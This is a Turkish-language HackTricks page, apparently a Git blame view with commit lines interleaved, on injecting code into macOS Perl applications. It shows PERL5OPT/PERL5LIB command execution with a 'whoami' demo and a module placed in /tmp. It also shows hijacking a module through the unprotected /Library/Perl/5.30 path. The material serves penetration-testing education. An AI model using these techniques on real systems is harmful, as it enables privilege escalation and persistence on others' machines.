Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md

81 lines
3.4 KiB
Markdown
Raw Permalink Normal View History

Translated to Turkish
2024-02-10 18:14:16 +00:00
# macOS Perl Uygulamaları Enjeksiyonu
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'binary-exploitation/arb
2024-07-18 17:54:59 +00:00
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'binary-exploitation/arb
2024-07-18 17:54:59 +00:00
<details>
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'binary-exploitation/arb
2024-07-18 17:54:59 +00:00
<summary>HackTricks'i Destekleyin</summary>
arte2
2024-01-04 09:09:56 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'binary-exploitation/arb
2024-07-18 17:54:59 +00:00
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek hackleme püf noktalarını paylaşın.
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
</details>
Translated ['README.md', 'backdoors/salseo.md', 'binary-exploitation/arb
2024-07-18 17:54:59 +00:00
{% endhint %}
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:43:52 +00:00
## `PERL5OPT` ve `PERL5LIB` Çevresel Değişkeni Aracılığıyla
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat
2024-03-17 16:37:08 +00:00
Çevresel değişken PERL5OPT kullanılarak perl'in keyfi komutları çalıştırması mümkündür.\
Translated to Turkish
2024-02-10 18:14:16 +00:00
Örneğin, bu betiği oluşturun:
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
{% code title="test.pl" %}
```perl
#!/usr/bin/perl
print "Hello from the Perl script!\n";
```
{% endcode %}
Translated ['generic-methodologies-and-resources/external-recon-methodol
2024-02-23 16:46:32 +00:00
Şimdi **çevre değişkenini ihraç et** ve **perl** betiğini çalıştır:
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
```bash
export PERL5OPT='-Mwarnings;system("whoami")'
perl test.pl # This will execute "whoami"
```
Translated to Turkish
2024-02-10 18:14:16 +00:00
Başka bir seçenek, bir Perl modülü oluşturmaktır (ör. `/tmp/pmod.pm`):
GITBOOK-4192: change request with no subject merged in GitBook
2023-12-16 13:28:14 +00:00
{% code title="/tmp/pmod.pm" %}
```perl
#!/usr/bin/perl
package pmod;
system('whoami');
1; # Modules must return a true value
```
{% endcode %}
Translated ['generic-methodologies-and-resources/external-recon-methodol
2024-02-23 16:46:32 +00:00
Ve ardından çevresel değişkenleri kullanın:
GITBOOK-4192: change request with no subject merged in GitBook
2023-12-16 13:28:14 +00:00
```bash
PERL5LIB=/tmp/ PERL5OPT=-Mpmod
```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:43:52 +00:00
## Bağımlılıklar Aracılığıyla
GITBOOK-4192: change request with no subject merged in GitBook
2023-12-16 13:28:14 +00:00
Translated ['generic-methodologies-and-resources/external-recon-methodol
2024-02-23 16:46:32 +00:00
Perl'in çalıştırıldığı bağımlılıkların klasör sırasını listelemek mümkündür:
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
```bash
perl -e 'print join("\n", @INC)'
```
Translated ['README.md', 'backdoors/salseo.md', 'binary-exploitation/arb
2024-07-18 17:54:59 +00:00
Hangi şu şekilde bir şey döndürecek:
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
```bash
/Library/Perl/5.30/darwin-thread-multi-2level
/Library/Perl/5.30
/Network/Library/Perl/5.30/darwin-thread-multi-2level
/Network/Library/Perl/5.30
/Library/Perl/Updates/5.30.3
/System/Library/Perl/5.30/darwin-thread-multi-2level
/System/Library/Perl/5.30
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
/System/Library/Perl/Extras/5.30
```
Translated ['README.md', 'backdoors/salseo.md', 'binary-exploitation/arb
2024-07-18 17:54:59 +00:00
Bazı dönen klasörler bile mevcut değil, ancak **`/Library/Perl/5.30`** mevcut, **SIP** tarafından **korunmuyor** ve **SIP** tarafından korunan klasörlerden **önce** bulunuyor. Bu nedenle, birisi o klasörü kötüye kullanarak betik bağımlılıklarını ekleyebilir ve yüksek ayrıcalıklı Perl betiği onu yükleyebilir.
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
GITBOOK-4192: change request with no subject merged in GitBook
2023-12-16 13:28:14 +00:00
{% hint style="warning" %}
Translated ['README.md', 'backdoors/salseo.md', 'binary-exploitation/arb
2024-07-18 17:54:59 +00:00
Ancak, o klasöre yazmak için **kök kullanıcı olmanız gerektiğini** unutmayın ve günümüzde bu **TCC uyarısı** alacaksınız:
GITBOOK-4192: change request with no subject merged in GitBook
2023-12-16 13:28:14 +00:00
{% endhint %}
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2
2024-05-05 22:43:52 +00:00
<figure><img src="../../../.gitbook/assets/image (28).png" alt="" width="244"><figcaption></figcaption></figure>
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'binary-exploitation/arb
2024-07-18 17:54:59 +00:00
Örneğin, bir betik **`use File::Basename;`** içe aktarıyorsa, `/Library/Perl/5.30/File/Basename.pm` oluşturarak keyfi kodları çalıştırmasını sağlamak mümkün olacaktır.
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
Translated to Turkish
2024-02-10 18:14:16 +00:00
## Referanslar
GITBOOK-4173: change request with no subject merged in GitBook
2023-12-04 09:24:40 +00:00
* [https://www.youtube.com/watch?v=zxZesAN-TEk](https://www.youtube.com/watch?v=zxZesAN-TEk)
Reference in a new issue Copy permalink